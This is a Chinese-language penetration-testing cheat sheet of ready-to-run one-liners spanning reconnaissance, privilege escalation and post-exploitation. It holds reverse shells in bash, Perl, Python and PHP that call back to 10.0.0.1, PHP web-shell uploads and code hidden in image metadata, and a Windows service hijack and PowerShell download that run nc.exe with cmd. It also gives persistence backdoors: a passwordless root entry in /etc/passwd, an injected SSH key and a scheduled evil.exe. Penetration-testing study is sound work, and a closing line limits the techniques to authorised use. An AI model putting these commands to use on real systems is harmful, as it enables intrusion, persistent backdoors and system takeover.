Pentesting 备忘录 - 全面渗透测试指南

情报侦查技术

网络扫描与主机发现

1. NMAP存活IP提取：

nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips

2. 简单端口扫描：

for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 1.1.1.1; done

DNS侦查技术

whois domain.com
dig {a|txt|ns|mx} domain.com
dig {a|txt|ns|mx} domain.com @ns1.domain.com
host -t {a|txt|ns|mx} megacorpone.com
host -a megacorpone.com
host -l megacorpone.com ns1.megacorpone.com
dnsrecon -d megacorpone.com -t axfr @ns2.megacorpone.com
dnsenum domain.com

Banner抓取方法

nc -v $TARGET 80
telnet $TARGET 80
curl -vX $TARGET

服务枚举与漏洞扫描

NFS共享利用

showmount -e 192.168.110.102
chown root:root sid-shell; chmod +s sid-shell

Kerberos用户枚举

nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'

HTTP暴力破解与扫描

target=10.0.0.1; gobuster -u http://$target -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster
target=10.0.0.1; nikto -h http://$target:80 | tee $target-nikto
target=10.0.0.1; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum

SMB/RPC枚举

rpcinfo -p $TARGET
nbtscan $TARGET
smbclient -L //$TARGET -U ""
rpcclient -U "" $TARGET
smbclient -L //$TARGET
enum4linux $TARGET

权限提升技术

Windows服务提权

1. 查找有SERVICE_ALL_ACCESS权限的服务：

accesschk.exe /accepteula -uwcqv "Authenticated Users" *

2. 修改服务配置：

sc config [service_name] binpath= "C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe" obj= "LocalSystem" password= ""
sc qc [service_name]
sc start [service_name]

AlwaysInstallElevated利用

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

未加引号的服务路径利用

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

反弹Shell技术

Bash反弹

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl反弹

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python反弹

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP反弹

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

文件上传与绕过技术

表单上传

curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php --cookie "cookie"

PUT方法上传

curl -X PUT -d '<?php system($_GET["c"]);?>' http://192.168.2.99/shell.php

图片注入PHP代码

exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' backdoor.jpeg
exiftool "-comment<=back.php" back.png

.htaccess技巧

AddType application/x-httpd-php .blah

密码破解技术

Hydra破解Web表单

hydra 10.10.10.52 http-post-form -L /usr/share/wordlists/list "/endpoit/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s PORT -P /usr/share/wordlists/list

HashCat破解

# Bruteforce based on the pattern
hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout

# Generate password candidates: wordlist + pattern
hashcat -a6 -m0 "e99a18c428cb38d5f260853678922e03" yourPassword|/usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable --stdout

后渗透技术

创建隐藏用户

echo 'spotless::0:0:root:/root:/bin/bash' >> /etc/passwd

添加SSH密钥

mkdir /root/.ssh 2>/dev/null; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChKCUsFVWj1Nz8SiM01Zw/BOWcMNs2Zwz3MdT7leLU9/Un4mZ7vjco0ctsyh2swjphWr5WZG28BN90+tkyj3su23UzrlgEu3SaOjVgxhkx/Pnbvuua9Qs9gWbWyRxexaC1eDb0pKXHH2Msx+GlyjfDOngq8tR6tkU8u1S4lXKLejaptiz0q6P0CcR6hD42IYkqyuWTNrFdSGLtiPCBDZMZ/5g1cJsyR59n54IpV0b2muE3F7+NPQmLx57IxoPjYPNUbC6RPh/Saf7o/552iOcmVCdLQDR/9I+jdZIgrOpstqSiJooU9+JImlUtAkFxZ9SHvtRbFt47iH7Sh7LiefP5 root@kali' >> /root/.ssh/authorized_keys

Windows定时任务

schtasks /create /sc minute /mo 10 /tn "TaskName" /tr C:\Windows\system32\evil.exe

文件传输技术

TFTP传输

# Linux启动TFTP
service atftpd start

# Windows获取文件
tftp -i $ATTACKER get /download/location/file /save/location/file

FTP传输

# Linux启动FTP
twistd -n ftp -p 21 -r /file/to/serve

# Windows非交互式FTP
(echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd

PowerShell下载

powershell -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe'); cmd /c nc.exe $ATTACKER 4444 -e cmd.exe" }

端口转发与隧道技术

SSH本地端口转发

ssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER

SSH动态端口转发

ssh -D 127.0.0.1:8080 user@SSH_SERVER

SSH远程端口转发

ssh -R 5555:LOCAL_HOST:3389 user@SSH_SERVER

HTTP隧道

# 服务端
hts -F localhost:22 80

# 客户端
htc -F 8080 192.168.1.15:80

特殊技巧

受限Shell突破

python -c 'import pty; pty.spawn("/bin/sh")'
/bin/busybox sh

Python代码执行

__import__('os').system('id')

错误字符生成

# Python
'\\'.join([ "x{:02x}".format(i) for i in range(1,256) ])

# Bash
for i in {1..255}; do printf "\\\x%02x" $i; done; echo -e "\r"

文件搜索技巧

# 快速查找文件
locate passwd 

# 查找可执行文件路径
which nc wget curl php perl python netcat tftp telnet ftp

# 递归查找.conf文件
find /etc -iname *.conf

总结

本备忘录涵盖了渗透测试的完整生命周期，从初始侦查到权限提升和后渗透操作。关键点包括：

1. 全面的网络和服务枚举技术
2. 多种反弹Shell方法适用于不同环境
3. 文件上传和绕过技巧
4. 密码破解和哈希攻击
5. Windows和Linux系统的权限提升方法
6. 后渗透持久化技术
7. 文件传输和数据渗透方法
8. 端口转发和隧道技术

这些技术应仅在授权测试中使用，并遵守相关法律法规。